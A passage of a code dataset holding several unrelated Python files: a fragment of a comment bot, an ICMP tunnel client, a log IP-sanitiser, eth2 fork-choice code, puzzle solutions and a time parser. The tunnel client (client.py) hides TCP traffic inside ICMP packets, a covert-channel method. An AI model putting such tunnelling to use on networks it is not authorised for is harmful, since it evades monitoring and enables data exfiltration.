\"save_time\": dateTimeObj,\n \"bot_number\":2,\n \"profile\": self.profile_index,\n \"new_reply\": True\n }\n self.saveComment(data)\n return True\n except:\n print(\"comment error\")\n self.driver.minimize_window()\n sleep(2)\n return False\n\n\n\nif __name__ == '__main__':\n bot = Bot()\n bot.manage(\"public\", 'bot1_dm1_link', \"bot1_dm2_link\",\"bot1_dm1_link\",\"10\")\n","sub_path":"bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"138350773","text":"import socket\r\nimport time\r\nimport os\r\nimport threading\r\nimport base64\r\nimport struct\r\nimport sys\r\nclass IcmpTunnel:\r\n DATA_LEN = 1024\r\n MAX_DATA_LEN = 712\r\n ADDR = 0\r\n MODE = 1\r\n ID = 0xB\r\n def __init__(self,addr,mode):\r\n raw_socket = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.getprotobyname(\"icmp\"))\r\n #raw_socket.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\r\n if mode == 0:\r\n raw_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n raw_socket.bind(addr)\r\n self.MODE = 0\r\n self.icmp_socket = raw_socket\r\n self.ADDR = addr\r\n \r\n def checkSum(self,packet):\r\n sum = 0\r\n countTo = (len(packet)//2)*2\r\n count = 0\r\n while count < countTo:\r\n sum += ((packet[count+1] << 8) | packet[count])\r\n count += 2\r\n \r\n if countTo < len(packet):\r\n sum += packet[len(packet) - 1]\r\n sum = sum & 0xffffffff\r\n \r\n sum = (sum >> 16) + (sum & 0xffff)\r\n sum = sum + (sum >> 16)\r\n answer = ~sum\r\n answer = answer & 0xffff\r\n answer = answer >> 8 | (answer << 8 & 0xff00)\r\n return answer\r\n\r\n def getIcmpData(self,packet):\r\n length = len(packet)\r\n return packet[length - self.DATA_LEN : length]\r\n \r\n 
def buildPackage(self,data):\r\n        check_sum = 0\r\n        ID = self.ID\r\n        packStr = '!BBHHH' + str(self.DATA_LEN) + 's'\r\n        if self.MODE == 0:\r\n            packet = struct.pack(packStr,0,0,check_sum,ID,0,data)\r\n            check_sum = self.checkSum(packet)\r\n            packet = struct.pack(packStr,0,0,check_sum,ID,0,data)\r\n        else:\r\n            packet = struct.pack(packStr,8,0,check_sum,ID,0,data)\r\n            check_sum = self.checkSum(packet)\r\n            packet = struct.pack(packStr,8,0,check_sum,ID,0,data) \r\n        return packet\r\n    \r\n    def getData(self,rawPacket):\r\n        # strip the IP header\r\n        length = len(rawPacket)\r\n        data = rawPacket[length - self.DATA_LEN : length]\r\n        icmp_header = rawPacket[20 : 28]\r\n        _type, code, checksum, packet_id, sequence = struct.unpack(\"!BBHHH\", icmp_header)\r\n        return (data,packet_id)\r\n    \r\n    def sendto(self,data,addr):\r\n        if len(data) > self.MAX_DATA_LEN:\r\n            return -1\r\n        data_b64_buf = base64.b64encode(data)\r\n        packet_buf = self.buildPackage(data_b64_buf)\r\n        _r = self.icmp_socket.sendto(packet_buf,addr)\r\n        return _r\r\n\r\n    def recvfrom(self,size):\r\n        while True:\r\n            raw_packet,addr = self.icmp_socket.recvfrom(size)\r\n            data,id = self.getData(raw_packet)\r\n            if id == self.ID:\r\n                data_b64_str = data.decode('ascii').strip(b'\\x00'.decode())\r\n                data_buf = base64.b64decode(data_b64_str)\r\n                return (data_buf,addr)\r\n            else:\r\n                continue\r\n\r\nsockDic = {}\r\nicmpSock = 0\r\nicmpAddr = ('10.0.0.10',0)\r\ntcpAddr = ('127.0.0.1',0)\r\n\r\ndef buildPacket(sockID,opt,length,data):\r\n    packet = struct.pack(\"III700s\",sockID,opt,length,data)\r\n    return packet\r\n\r\ndef decodePacket(packet):\r\n    sockID,opt,length,data = struct.unpack(\"III700s\",packet)\r\n    return (sockID,opt,length,data)\r\n\r\ndef closeTcp(sock_id):\r\n    try:\r\n        sockDic[sock_id].close()\r\n        del sockDic[sock_id]\r\n    except BaseException:\r\n        pass\r\n\r\ndef tcpRecvLoop(tcp_sock,sock_id):\r\n    while True:\r\n        try:\r\n            data = tcp_sock.recv(700)\r\n            if not data:\r\n                print(\"[!]A conn closed.\")\r\n                # notify the remote end to disconnect this client\r\n                icmpSock.sendto(buildPacket(sock_id,0xB,5,b'close'),icmpAddr)\r\n                closeTcp(sock_id)\r\n                break\r\n            icmpSock.sendto(buildPacket(sock_id,0xC,len(data),data),icmpAddr)\r\n            time.sleep(0.001)\r\n        except BaseException:\r\n            print(\"[!]A conn closed.\")\r\n            # notify the remote end to disconnect this client\r\n            icmpSock.sendto(buildPacket(sock_id,0xB,5,b'close'),icmpAddr)\r\n            closeTcp(sock_id)\r\n            break\r\n    print(\"tcpRecv thread exit!\")\r\n\r\ndef icmpLoop():\r\n    while True:\r\n        packet,addr = icmpSock.recvfrom(2048)\r\n        try:\r\n            sockID,opt,length,data = decodePacket(packet)\r\n        except BaseException:\r\n            continue\r\n        data = data[0:length]\r\n        if opt == 0xA:\r\n            #connect\r\n            print(\"[+]connect ID: \" + str(sockID))\r\n            tcpSock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n            try:\r\n                tcpSock.connect(tcpAddr)\r\n            except BaseException:\r\n                print(\"Connect failed. 
Sock ID:\" + str(sockID))\r\n icmpSock.sendto(buildPacket(sockID,0xB,5,b'close'),icmpAddr)\r\n continue \r\n sockDic[sockID] = tcpSock\r\n threading.Thread(target=tcpRecvLoop,args=(tcpSock,sockID)).start()\r\n continue\r\n if opt == 0xB:\r\n print(\"[-]Close ID: \" + str(sockID))\r\n closeTcp(sockID)\r\n continue\r\n if opt == 0xC:\r\n #forward data\r\n print(\"[+]forward ID: \" + str(sockID))\r\n try:\r\n sockDic[sockID].sendall(data)\r\n except BaseException:\r\n pass\r\n \r\ndef heart():\r\n #keep live\r\n while 1:\r\n time.sleep(10)\r\n icmpSock.sendto(buildPacket(0,0xD,6,b'heart'),icmpAddr)\r\n\r\ndef init(icmpSrvAddr,localSrvAddr):\r\n global icmpAddr\r\n global tcpAddr\r\n global icmpSock\r\n #set addr\r\n icmpAddr = icmpSrvAddr\r\n tcpAddr = localSrvAddr\r\n #online\r\n icmpSock = IcmpTunnel((\"0\",0),1)\r\n icmpSock.sendto(b'online',icmpAddr)\r\n #Create tcp sock\r\n threading.Thread(target=icmpLoop).start()\r\n threading.Thread(target=heart).start()\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) < 3:\r\n print(\"client.py IcmpIpAddress TcpAddress:port\")\r\n os._exit(0)\r\n try:\r\n icmp_addr = (sys.argv[1],0)\r\n tcp_addr = (sys.argv[2].split(':')[0],int(sys.argv[2].split(':')[1]))\r\n except BaseException:\r\n os._exit(0)\r\n\r\n print(\"Remote icmp:\" + str(icmp_addr))\r\n print(\"Tcp Address:\" + str(tcp_addr))\r\n init(icmp_addr,tcp_addr)\r\n print(\"exit stop\")\r\n while True:\r\n x = input('>>')\r\n if x == 'exit':\r\n os._exit(0)","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"389208094","text":"\"\"\"\nsanitize.py - Remove IPs from pixel logs\nBased off NodeJS version.\n\nAuthor: Martín \"Netux\" Rodriguez\n\"\"\"\n\nimport re\nfrom pathlib import Path\n\n# IPv6 regex from https://stackoverflow.com/a/17871737/7492433\nIP_REGEX = re.compile(r'(?:\\d{1,3})(?:\\.(?:\\d{1,3})){3}|(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))', re.IGNORECASE)\n\nif __name__ == '__main__':\n\timport sys\n\n\tUSAGE = f'Usage: {sys.argv[0]} [path/to/pixels.log] [path/to/pixels.sanit.log]'\n\tprint_err = lambda v: sys.stderr.write(str(v) + '\\n')\n\n\tif '--help' in sys.argv:\n\t\tprint(USAGE)\n\t\tsys.exit(0)\n\n\tlog_path = Path(sys.argv[1] if len(sys.argv) > 1 else 'pixels.log')\n\toutput_path = Path(sys.argv[2] if len(sys.argv) > 2 else log_path.with_suffix('.sanit' + log_path.suffix))\n\n\tif not log_path.exists():\n\t\tprint_err(f'{log_path.name} doesn\\'t exist')\n\t\tsys.exit(1)\n\n\twith log_path.open('r', encoding='utf-8') as log_file:\n\t\twith output_path.open('w', encoding='utf-8') as output_file:\n\t\t\tfor i, line in enumerate(log_file):\n\t\t\t\t# DATE\\tUSERNAME\\tX\\tY\\tCOLOR_INDEX\\tIP\\tACTION_TYPE\n\t\t\t\tsplit_line = line.split('\\t')\n\t\t\t\tout_line = None\n\n\t\t\t\tif len(split_line) != 
7:\n\t\t\t\t\tprint(f'Line {i + 1} doesn\\'t have exactly 7 fields. Manual review needed.')\n\t\t\t\t\tout_line = line\n\t\t\t\telse:\n\t\t\t\t\tdel split_line[5]\n\n\t\t\t\t\tout_line = '\\t'.join(split_line)\n\t\t\t\t\tif IP_REGEX.search(out_line):\n\t\t\t\t\t\tprint(f'Failed to remove IP on line {i + 1}. Manual review needed.')\n\t\t\t\t\t\tout_line = line\n\n\t\t\t\toutput_file.write(out_line)\n\n\t\t\tprint('Done.')\n\n","sub_path":"extras/logs/sanitize.py","file_name":"sanitize.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"202272816","text":"from typing import Dict, Iterable, Optional, Sequence, Tuple, Type, Union\n\nfrom eth_utils import to_tuple\nfrom eth_utils.toolz import curry, first, mapcat, merge, merge_with, second, valmap\n\nfrom eth2.beacon.db.chain import BeaconChainDB\nfrom eth2.beacon.epoch_processing_helpers import get_attesting_indices\nfrom eth2.beacon.helpers import compute_epoch_at_slot, get_active_validator_indices\nfrom eth2.beacon.operations.attestation_pool import AttestationPool\nfrom eth2.beacon.types.attestation_data import AttestationData\nfrom eth2.beacon.types.attestations import Attestation\nfrom eth2.beacon.types.blocks import BaseBeaconBlock\nfrom eth2.beacon.types.pending_attestations import PendingAttestation\nfrom eth2.beacon.types.states import BeaconState\nfrom eth2.beacon.typing import Gwei, SigningRoot, Slot, ValidatorIndex\nfrom eth2.configs import CommitteeConfig, Eth2Config\n\n# TODO(ralexstokes) integrate `AttestationPool` once it has been merged\nAttestationIndex = Dict[ValidatorIndex, AttestationData]\nPreIndex = Dict[ValidatorIndex, Tuple[Slot, AttestationData]]\nAttestationLike = Union[Attestation, PendingAttestation]\n\n\ndef _take_latest_attestation_by_slot(\n candidates: Sequence[Tuple[Slot, AttestationData]]\n) -> Tuple[Slot, AttestationData]:\n return max(candidates, key=first)\n\n\nclass Store:\n \"\"\"\n A private class meant to encapsulate data access for the functionality in this module.\n \"\"\"\n\n def __init__(\n self,\n chain_db: BeaconChainDB,\n state: BeaconState,\n attestation_pool: AttestationPool,\n block_class: Type[BaseBeaconBlock],\n config: Eth2Config,\n ):\n self._db = chain_db\n self._block_class = block_class\n self._config = config\n self._attestation_index = self._build_attestation_index(state, attestation_pool)\n\n @curry\n def _mk_pre_index_from_attestation(\n self, state: BeaconState, attestation: AttestationLike\n ) -> Iterable[PreIndex]:\n attestation_data = attestation.data\n slot = attestation_data.slot\n\n return (\n {index: (slot, attestation_data)}\n for index in get_attesting_indices(\n state,\n attestation.data,\n attestation.aggregation_bits,\n CommitteeConfig(self._config),\n )\n )\n\n def _mk_pre_index_from_attestations(\n self, state: BeaconState, attestations: Sequence[AttestationLike]\n ) -> PreIndex:\n \"\"\"\n A 'pre-index' is a Dict[ValidatorIndex, Tuple[Slot, AttestationData]].\n \"\"\"\n return merge(*mapcat(self._mk_pre_index_from_attestation(state), attestations))\n\n def _build_attestation_index(\n self, state: BeaconState, attestation_pool: AttestationPool\n ) -> AttestationIndex:\n \"\"\"\n Assembles a dictionary of latest attestations keyed by validator index.\n Any attestation made by a validator in the ``attestation_pool`` that occur after the\n last known attestation according to the state take precedence.\n\n We start by building a 'pre-index' from all known attestations which 
map validator\n indices to a pair of slot and attestation data. A final index is built from all\n pre-indices by keeping the entry with the highest slot across the set of all\n duplicates in the pre-indices keyed by validator index.\n \"\"\"\n previous_epoch_index = self._mk_pre_index_from_attestations(\n state, state.previous_epoch_attestations\n )\n\n current_epoch_index = self._mk_pre_index_from_attestations(\n state, state.current_epoch_attestations\n )\n\n pool_index = self._mk_pre_index_from_attestations(\n state, tuple(attestation for _, attestation in attestation_pool)\n )\n\n index_by_latest_slot = merge_with(\n _take_latest_attestation_by_slot,\n previous_epoch_index,\n current_epoch_index,\n pool_index,\n )\n # convert the index to a mapping of ValidatorIndex -> (latest) Attestation\n return valmap(second, index_by_latest_slot)\n\n def _get_latest_attestation(\n self, index: ValidatorIndex\n ) -> Optional[AttestationData]:\n \"\"\"\n Return the latest attesation we know from the validator with the\n given ``index``.\n \"\"\"\n return self._attestation_index.get(index, None)\n\n def _get_block_by_root(self, root: SigningRoot) -> BaseBeaconBlock:\n return self._db.get_block_by_root(root, self._block_class)\n\n def get_latest_attestation_target(\n self, index: ValidatorIndex\n ) -> Optional[BaseBeaconBlock]:\n attestation = self._get_latest_attestation(index)\n if not attestation:\n return None\n try:\n target_block = self._get_block_by_root(attestation.beacon_block_root)\n except KeyError:\n # attestation made for a block we have not imported\n return None\n return target_block\n\n def _get_parent_block(self, block: BaseBeaconBlock) -> BaseBeaconBlock:\n return self._db.get_block_by_root(block.parent_root, self._block_class)\n\n def get_ancestor(self, block: BaseBeaconBlock, slot: Slot) -> BaseBeaconBlock:\n \"\"\"\n Return the block in the chain that is a\n predecessor of ``block`` at the requested ``slot``.\n \"\"\"\n if block.slot > slot:\n return self.get_ancestor(self._get_parent_block(block), slot)\n elif block.slot == slot:\n return block\n else:\n return None\n\n\nAttestationTarget = Tuple[ValidatorIndex, Optional[BaseBeaconBlock]]\n\n\n@curry\ndef _find_latest_attestation_target(\n store: Store, index: ValidatorIndex\n) -> AttestationTarget:\n return (index, store.get_latest_attestation_target(index))\n\n\n@to_tuple\ndef _find_latest_attestation_targets(\n state: BeaconState, store: Store, config: Eth2Config\n) -> Iterable[AttestationTarget]:\n epoch = compute_epoch_at_slot(state.slot, config.SLOTS_PER_EPOCH)\n active_validators = get_active_validator_indices(state.validators, epoch)\n return filter(\n second, map(_find_latest_attestation_target(store), active_validators)\n )\n\n\ndef _get_ancestor(store: Store, block: BaseBeaconBlock, slot: Slot) -> BaseBeaconBlock:\n return store.get_ancestor(block, slot)\n\n\ndef _balance_for_validator(state: BeaconState, validator_index: ValidatorIndex) -> Gwei:\n return state.validators[validator_index].effective_balance\n\n\ndef score_block_by_attestations(\n state: BeaconState,\n store: Store,\n attestation_targets: Sequence[AttestationTarget],\n block: BaseBeaconBlock,\n) -> int:\n \"\"\"\n Return the total balance attesting to ``block`` based on the ``attestation_targets``.\n \"\"\"\n return sum(\n _balance_for_validator(state, validator_index)\n for validator_index, target in attestation_targets\n if _get_ancestor(store, target, block.slot) == block\n )\n\n\ndef score_block_by_root(block: BaseBeaconBlock) -> int:\n return 
int.from_bytes(block.hash_tree_root[:8], byteorder=\"big\")\n\n\n@curry\ndef lmd_ghost_scoring(\n chain_db: BeaconChainDB,\n attestation_pool: AttestationPool,\n state: BeaconState,\n config: Eth2Config,\n block_class: Type[BaseBeaconBlock],\n block: BaseBeaconBlock,\n) -> int:\n \"\"\"\n Return the score of the ``target_block`` according to the LMD GHOST algorithm,\n using the lexicographic ordering of the block root to break ties.\n \"\"\"\n store = Store(chain_db, state, attestation_pool, block_class, config)\n\n attestation_targets = _find_latest_attestation_targets(state, store, config)\n\n attestation_score = score_block_by_attestations(\n state, store, attestation_targets, block\n )\n\n block_root_score = score_block_by_root(block)\n\n return attestation_score + block_root_score\n","sub_path":"eth2/beacon/fork_choice/lmd_ghost.py","file_name":"lmd_ghost.py","file_ext":"py","file_size_in_byte":7855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"109987831","text":"\"\"\"\n1473. Paint House III (Hard)\n\nThere is a row of m houses in a small city, each house must be painted with one of the n colors (labeled from 1 to n), some houses that has been painted last summer should not be painted again.\n\nA neighborhood is a maximal group of continuous houses that are painted with the same color. (For example: houses = [1,2,2,3,3,2,1,1] contains 5 neighborhoods [{1}, {2,2}, {3,3}, {2}, {1,1}]).\n\nGiven an array houses, an m * n matrix cost and an integer target where:\n\nhouses[i]: is the color of the house i, 0 if the house is not painted yet.\ncost[i][j]: is the cost of paint the house i with the color j+1.\nReturn the minimum cost of painting all the remaining houses in such a way that there are exactly target neighborhoods, if not possible return -1.\n\n \n\nExample 1:\n\nInput: houses = [0,0,0,0,0], cost = [[1,10],[10,1],[10,1],[1,10],[5,1]], m = 5, n = 2, target = 3\nOutput: 9\nExplanation: Paint houses of this way [1,2,2,1,1]\nThis array contains target = 3 neighborhoods, [{1}, {2,2}, {1,1}].\nCost of paint all houses (1 + 1 + 1 + 1 + 5) = 9.\nExample 2:\n\nInput: houses = [0,2,1,2,0], cost = [[1,10],[10,1],[10,1],[1,10],[5,1]], m = 5, n = 2, target = 3\nOutput: 11\nExplanation: Some houses are already painted, Paint the houses of this way [2,2,1,2,2]\nThis array contains target = 3 neighborhoods, [{2,2}, {1}, {2,2}]. 
\nCost of paint the first and last house (10 + 1) = 11.\nExample 3:\n\nInput: houses = [0,0,0,0,0], cost = [[1,10],[10,1],[1,10],[10,1],[1,10]], m = 5, n = 2, target = 5\nOutput: 5\nExample 4:\n\nInput: houses = [3,1,2,3], cost = [[1,1,1],[1,1,1],[1,1,1],[1,1,1]], m = 4, n = 3, target = 3\nOutput: -1\nExplanation: Houses are already painted with a total of 4 neighborhoods [{3},{1},{2},{3}] different of target = 3.\n \n\nConstraints:\n\nm == houses.length == cost.length\nn == cost[i].length\n1 <= m <= 100\n1 <= n <= 20\n1 <= target <= m\n0 <= houses[i] <= n\n1 <= cost[i][j] <= 10^4\n\"\"\"\n\nclass Solution(object):\n    def minCost(self, houses, cost, m, n, target):\n        \"\"\"\n        :type houses: List[int]\n        :type cost: List[List[int]]\n        :type m: int\n        :type n: int\n        :type target: int\n        :rtype: int\n        \"\"\"\n        # wrong dfs will be TLE\n        todos = [i for i in range(m) if houses[i] == 0]\n\n        # sort cost\n        sort_cost = []\n        for i, tmpcost in enumerate(cost):\n            newcost = list(zip(tmpcost, range(1,n+1)))  # list() so .sort() also works on Python 3\n            newcost.sort()\n            newcost = [(item[1], item[0]) for item in newcost]\n            sort_cost.append(newcost)\n        # print(cost)\n        # print(sort_cost)\n        # return\n\n        # sanity check\n        def check_cnt():\n            diffs = []\n            for item in houses:\n                if item == 0:\n                    continue\n                if len(diffs) == 0 or item != diffs[-1]:\n                    diffs.append(item)\n            return len(diffs)\n\n        # houses = [1,2,1,0,0]\n        # print(check_cnt())\n        # exit()\n\n        if check_cnt() > target:\n            return -1\n        if len(todos) == 0:\n            if check_cnt() == target:\n                return 0\n            else:\n                return -1\n\n        def calculate_cost():\n            tmpres = 0\n            for i, item in enumerate(houses):\n                if item > 0:\n                    tmpres += cost[i][item-1]\n            return tmpres\n\n        self.result = float('inf')\n\n        def dfs(idx):\n            print('work on', idx)\n            # work on todos[idx]\n            r_idx = todos[idx]\n            if idx == len(todos) - 1: # edge case\n                for c, _ in sort_cost[r_idx]: # range(1, n+1):\n                    houses[r_idx] = c\n                    if check_cnt() == target:\n                        # calculate cost\n                        tmpres = calculate_cost()\n                        self.result = min(tmpres, self.result)\n                houses[r_idx] = 0\n            else:\n                # for i in range(1, n+1):\n                for c, _ in sort_cost[r_idx]:\n                    houses[r_idx] = c\n                    tmp_cnt = check_cnt()\n                    if tmp_cnt > target: # too many colors\n                        continue\n                    if tmp_cnt + len(todos) -1 - idx < target: # too few\n                        continue\n                    if calculate_cost() > self.result:\n                        continue\n                    dfs(idx+1)\n                houses[r_idx] = 0\n\n        dfs(0)\n        if self.result == float('inf'):\n            return -1\n        result = self.result - calculate_cost()\n        return result\n\n    def solve2(self, houses, cost, m, n, target):\n\n        memo = {}\n        if houses[-1] == 0:\n            for i, c in enumerate(cost[-1]):\n                memo[1, i+1] = c\n        else:\n            memo[1, houses[-1]] = 0\n        # print(memo)\n\n        for ind in range(m-2, -1, -1):\n            new_memo = {}\n            # case 1: occupied\n            if houses[ind] > 0:\n                for k, color in memo.keys():\n                    if color == houses[ind]:\n                        new_memo[k, houses[ind]] = min(new_memo.get((k, houses[ind]), float('inf')), memo[k, color])\n                    else:\n                        new_memo[k+1, houses[ind]] = min(new_memo.get((k+1, houses[ind]),float('inf')), memo[k, color])\n            else: # not occupied\n                for c in range(1, n+1):\n                    for k, color in memo.keys():\n                        if c == color:\n                            new_memo[k, c] = min(new_memo.get((k,c), float('inf')), memo[k, color] + cost[ind][c-1])\n                        else:\n                            new_memo[k+1, c] = min(new_memo.get((k+1,c), float('inf')), memo[k, color] + cost[ind][c-1])\n            memo = new_memo\n            keys = list(memo.keys())  # copy the keys so entries can be deleted while looping (Python 3 safe)\n            for k in keys:\n                if k[0] > target:\n                    del memo[k]\n        \n        result = float('inf')\n        for k in memo.keys():\n            if k[0] == target:\n                result = min(result, memo[k])\n        if result == float('inf'):\n            return -1\n        return result\n\n    def solve3(self, A, cost, m, n, 
target):\n dp, dp2 = {(0, 0): 0}, {}\n for i, a in enumerate(A):\n for cj in (range(1, n + 1) if a == 0 else [a]):\n for ci, b in dp:\n b2 = b + (ci != cj)\n if b2 > target: continue\n dp2[cj, b2] = min(dp2.get((cj,b2), float('inf')), dp[ci, b] + (cost[i][cj - 1] if cj != a else 0))\n dp, dp2 = dp2, {}\n return min([dp[c, b] for c, b in dp if b == target] or [-1])\n\n\nif __name__ == \"__main__\":\n a = Solution()\n \"\"\"\n print(a.solve2([0,0,0,0,0], [[1,10],[10,1],[10,1],[1,10],[5,1]], 5, 2, 3))\n print(a.solve2([0,2,1,2,0], [[1,10],[10,1],[10,1],[1,10],[5,1]], 5, 2, 3))\n print(a.solve2([0,0,0,0,0], [[1,10],[10,1],[1,10],[10,1],[1,10]], 5, 2, 5))\n print(a.solve2([3,1,2,3], [[1,1,1],[1,1,1],[1,1,1],[1,1,1]], 4, 3, 3))\n print(a.solve2([2,2,1], [[1,1],[3,4],[4,2]], 3, 2, 2))\n print(a.solve2([1,1,1,0,2,0,0,2,0,0], [[6,8,5],[4,8,3],[7,1,10],[4,9,8],[4,7,6],[6,5,1],[8,9,4],[7,6,3],[9,5,10],[8,8,4]], 10, 3, 10))\n \"\"\"\n houses = [4,0,0,0,4,11,0,0,0,0,3,0,0,0,0,5,0,0,0,0,0,8,2,2,0]\n cost = [[33,13,38,3,25,10,49,9,10,36,39,3],[47,19,6,37,2,23,50,18,46,14,24,33],[32,31,32,17,36,41,43,29,36,29,47,3],[25,27,5,31,1,17,27,46,10,8,31,49],[50,16,33,24,42,2,33,39,43,31,2,38],[38,6,23,18,9,13,31,36,28,7,7,1],[40,23,21,5,48,2,18,24,6,27,39,44],[25,43,4,9,5,5,30,42,23,41,7,15],[45,32,44,15,5,1,2,43,49,30,29,4],[39,26,42,45,27,28,41,6,42,27,4,43],[32,2,43,13,15,30,32,12,36,5,19,22],[12,23,13,8,8,9,32,43,46,41,43,8],[10,18,27,2,7,40,44,50,32,29,42,10],[50,7,15,9,32,9,15,10,15,41,10,36],[48,6,26,6,14,37,44,47,4,44,1,30],[34,46,12,32,19,1,18,31,1,16,44,48],[15,35,17,14,16,29,23,18,28,26,45,17],[43,45,7,39,37,18,18,33,24,47,27,46],[17,12,15,20,44,34,14,8,28,40,12,21],[18,10,15,47,21,7,47,34,37,49,16,24],[19,3,38,14,32,21,4,25,34,3,33,23],[21,45,3,49,45,40,38,10,30,5,37,21],[29,38,43,22,44,26,3,18,45,40,40,17],[21,12,30,23,4,25,32,43,37,15,35,30],[38,14,6,21,3,43,43,30,9,19,39,17]]\n m = 25\n n = 12\n target = 15\n print(a.solve3(houses, cost, m, n, target))\n","sub_path":"python/leetcode/dp/1473_paint_house_iii.py","file_name":"1473_paint_house_iii.py","file_ext":"py","file_size_in_byte":8254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"434507020","text":"# -*- coding: utf-8 -*-\n# Project Euler 53\n\nimport sympy\n\nans = 0\n\nfor n in range(23, 101):\n tmp_ans = 0\n\n for r in range(n//2, -1, -1):\n if sympy.binomial(n, r) <= 1e6:\n break\n\n tmp_ans += 1\n\n ans += tmp_ans * 2 - (1 if n % 2 == 0 else 0)\n\nprint(ans)\n\n\n\n\n","sub_path":"project_euler/53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"287069655","text":"\nIN_PWEAVE = __name__ == '__builtin__'\n\n# python standard library\nimport re\nimport math\nfrom datetime import timedelta\nfrom datetime import datetime\nif IN_PWEAVE:\n import os\n\n# third-party\nfrom dateutil.relativedelta import relativedelta\nimport dateutil.parser\nfrom validate import Validator\n\n# this package\nfrom theape import BaseClass\nfrom theape import ApeError\nfrom theape.parts.oatbran import CharacterClass, Numbers, Group\nfrom theape.parts.oatbran import CommonPatterns\nfrom theape.infrastructure.code_graphs import module_diagram, class_diagram\n\nZERO = '0'\nINT_ZERO = 0\nONE = 1\nMICRO = 10**6\n\nclass RelativeTimeMapGroups(object):\n __slots__ = ()\n years = 'years'\n months = 'months'\n weeks = 'weeks'\n days = 'days'\n hours = 'hours'\n minutes = 'minutes'\n seconds = 
'seconds'\n# end RelativeTimeMapGroups\n\nclass RelativeTimeMap(BaseClass):\n \"\"\"\n A converter from strings with relative times to seconds\n \"\"\"\n def __init__(self):\n super(RelativeTimeMap, self).__init__()\n self._year_expression = None\n self._month_expression = None\n self._week_expression = None\n self._day_expression = None\n self._hour_expression = None\n self._minute_expression = None\n self._second_expression = None\n return\n\n @property\n def year_expression(self):\n \"\"\"\n A compiled regex to match a year (only checks for y)\n \"\"\"\n if self._year_expression is None:\n self._year_expression = re.compile(Group.named(name=RelativeTimeMapGroups.years,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Yy')\n )\n return self._year_expression\n\n @property\n def month_expression(self):\n \"\"\"\n A compiled regex to match a month (check for 'mo' only)\n \"\"\"\n if self._month_expression is None:\n self._month_expression = re.compile(Group.named(name=RelativeTimeMapGroups.months,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Mm') +\n CharacterClass.character_class('Oo'))\n return self._month_expression\n\n @property\n def week_expression(self):\n \"\"\"\n A compiled regex to extract a number of weeks\n \"\"\"\n if self._week_expression is None:\n self._week_expression = re.compile(Group.named(name=RelativeTimeMapGroups.weeks,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Ww'))\n return self._week_expression\n\n @property\n def day_expression(self):\n \"\"\"\n A compiled regex to extract the number of days\n \"\"\"\n if self._day_expression is None:\n self._day_expression = re.compile(Group.named(name=RelativeTimeMapGroups.days,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Dd'))\n return self._day_expression\n\n @property\n def hour_expression(self):\n \"\"\"\n A compiled regex to extract the number of hours\n \"\"\"\n if self._hour_expression is None:\n self._hour_expression = re.compile(Group.named(name=RelativeTimeMapGroups.hours,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Hh'))\n return self._hour_expression\n\n @property\n def minute_expression(self):\n \"\"\"\n A compiled regex to extract the number of minutes\n \"\"\"\n if self._minute_expression is None:\n self._minute_expression = re.compile(Group.named(name=RelativeTimeMapGroups.minutes,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Mm') +\n CharacterClass.character_class('Ii'))\n return self._minute_expression\n\n @property\n def second_expression(self):\n \"\"\"\n A compiled regex to extract the number of seconds\n \"\"\"\n if self._second_expression is None:\n self._second_expression = re.compile(Group.named(name=RelativeTimeMapGroups.seconds,\n expression=Numbers.real) +\n CommonPatterns.optional_spaces +\n CharacterClass.character_class('Ss'))\n return self._second_expression\n#end class RelativeTimeMap\n\ndef source_required(method):\n \"\"\"\n Catches AttributeErrors and TypeErrors and raises ApeErrors in their place so the operators can recover\n\n :param:\n\n - `method`: the method to decorate\n \"\"\"\n def wrapped(self, *args, **kwargs):\n try:\n return method(self, *args, **kwargs)\n except (AttributeError, TypeError) as error:\n self.log_error(error)\n raise ApeError(\"self.source not set 
